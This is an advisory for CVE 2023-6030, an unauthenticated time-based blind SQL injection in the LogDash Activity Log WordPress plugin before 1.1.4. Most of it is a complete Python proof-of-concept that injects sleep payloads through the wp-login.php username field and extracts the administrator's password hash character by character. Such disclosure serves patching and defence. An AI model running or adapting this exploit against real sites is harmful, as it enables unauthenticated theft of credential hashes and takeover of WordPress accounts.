LogDash Activity Log < 1.1.4 – Unauthenticated SQLi | CVE 2023-6030

Description

The plugin hooks the wp_login_failed function (from src/Hooks/Users.php) in order to log failed login attempts to the database but it doesn't escape the username when it perform some SQL request leading to a SQL injection vulnerability which can be exploited using time-based technique by unauthenticated attacker

Proof of Concept

import sys
from time import sleep, monotonic
from binascii import unhexlify

import requests
from requests.exceptions import RequestException

HEX_CHARS = "0123456789ABCDEFG"
SLEEP_TIME = "10"  # Must be an int
TIMEOUT = 10


def compare_char(idx: int, ope: str, value: str):
    return f"select substr(hex(user_pass),{idx},1){ope}'{value}' from wp_users where ID=1"

def sleep_if(cond: str, time: int):
    return f"sleep(if(({cond}),{time},0))"

def select_sleep(statement):
    return f"(select 1 from (select({statement}))YY)"

def find_char_range_at_index(idx: int):
    yield "ABCDEF", sleep_if(compare_char(idx, " < ", "G"), SLEEP_TIME)
    yield "56789", sleep_if(compare_char(idx, " < ", "A"), SLEEP_TIME)
    yield "01234", sleep_if(compare_char(idx, " < ", "5"), SLEEP_TIME)
    yield "", sleep_if(compare_char(idx, " < ", "0"), SLEEP_TIME)

def find_char_at_index(idx: int, char_range: str):
    for c in char_range:
        yield c, sleep_if(compare_char(idx, " = ", c), SLEEP_TIME)


def exploit(url: str):
    sess = requests.session()
    sess.headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
    sess.get(url)

    data = {
            "log": "",
            "pwd": "dddd",
            "wp-submit": "Log In",
            "redirect_to": url.replace("wp-login.php", "wp-admin/"),
            "testcookie": "1",
    }

    idx = 1
    hex_hash = ""
    while True:
        possible_chars = ""
        for char_range, statement in find_char_range_at_index(idx):
            sql = "' OR " + select_sleep(statement) + " # a"
            data["log"] = sql
            start = monotonic()

            try:
                sess.post(
                    url,
                    data=data,
                    timeout=TIMEOUT,
                    headers={
                        "Cookie": "wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US",
                        "Pragma": "no-cache",
                        "Cache-Control": "no-cache",
                        "Referer": url,
                        "Upgrade-Insecure-Requests": "1",
                    },
                )
            except RequestException:
                pass

            if monotonic() - start > TIMEOUT:
                possible_chars = char_range

        if not possible_chars:
            # We reached end of string
            break

        for c, statement in find_char_at_index(idx, possible_chars):
            sql = "' OR " + select_sleep(statement) + " # a"
            data["log"] = sql

            start = monotonic()
            try:
                sess.post(
                    url,
                    data=data,
                    timeout=TIMEOUT,
                    headers={
                        "Cookie": "wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US",
                        "Pragma": "no-cache",
                        "Cache-Control": "no-cache",
                        "Referer": url,
                        "Upgrade-Insecure-Requests": "1",
                    },
                )
            except RequestException:
                pass

            if monotonic() - start > TIMEOUT:
                # timeout occurred meaning we found the good char
                hex_hash += c
                sys.stdout.write(c)
                sys.stdout.flush()
                break

        idx += 1

    print('')
    print("hexencoded hash:", hex_hash)
    if len(hex_hash) % 2 == 1:
        print("extraction failed, odd length")
    else:
        print("hash:", unhexlify(hex_hash).decode("utf-8", errors="ignore"))

if __name__ == "__main__":
    print("-*- Blind SQL exploit for Wordpress plugin LogDash Activity Log -*-")
    print("             devloop 2023 - https://devl00p.github.io/")
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} http://target/wp-login.php")
    else:
        exploit(sys.argv[1])